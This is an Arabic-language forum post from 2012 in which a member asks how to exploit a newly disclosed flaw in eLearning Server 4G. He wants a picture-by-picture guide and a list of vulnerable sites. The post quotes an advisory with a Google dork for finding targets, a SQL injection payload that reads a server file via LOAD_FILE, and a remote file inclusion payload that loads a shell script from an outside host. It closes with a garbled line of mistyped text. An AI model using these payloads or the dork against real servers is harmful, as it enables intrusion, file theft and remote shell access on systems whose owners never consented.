عرض مشاركة واحدة
قديم 05-14-2012, 12:25 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
qasim
 
الصورة الرمزية qasim
 

 

 
إحصائية العضو





qasim غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
qasim is on a distinguished road

افتراضي كيف استغل هذه الثغره؟ ارجوا المساعده


السلام عليكم ايها الاحبه

لي الشرف ان اكون بينكم وقد تعلمت الكثير في هذه الفتره القصيره من بدايتي

لدي سؤال وارجو من اهل الخبره المساعده

هذا هو الدورك الجديد للثغره الجديده

كيف ممكن استغلها

اريد شرح بالصور واي موقع مصاب بهذه الثغره حتى تعم الفائده للجميع
http://cxsecurity.com/issue/WLB-2012050086


# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:"eLearning Server"
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 "nid" SQL injection:
POC:
/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20File s\\Hypermethod\\eLearningServer\\index.php'),4,5,6 ,7,8
,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?



;dt hsjyg i`i hgeyvi? hv[,h hglshu]i

   

رد مع اقتباس